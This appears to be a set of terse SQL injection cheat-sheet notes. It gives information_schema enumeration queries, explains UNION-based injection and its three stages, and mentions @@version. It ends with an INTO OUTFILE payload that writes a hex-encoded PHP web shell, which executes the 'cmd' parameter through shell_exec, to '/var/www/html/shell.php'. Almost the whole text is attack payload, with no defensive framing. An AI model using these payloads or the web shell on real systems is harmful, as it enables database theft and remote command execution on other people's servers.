SELECT table_schema, table_name, 1 FROM information_schema.tables
SELECT table_name, column_name, 1 FROM information_schema.columns
It's done by commenting out the rest by using -- and providing + as the blank space at the end
The UNION keyword lets you execute one or more additional SELECT queries and append the results to the original query. For example:
SELECT 1, 2 FROM usernames UNION SELECT 1, 2 FROM passwords
UNION SQLi attack consists of 3 stages:
You need to determine the number of columns you can retrieve.
You make sure that the columns you found are in a suitable format
Attack and get some interesting data.
@@version
example:
INTO OUTFILE '/var/www/html/shell.php' LINES TERMINATED BY 0x3C3F706870206563686F20223C7072653E22202E207368656C6C5F6578656328245F4745545B22636D64225D29202E20223C2F7072653E223B3F3E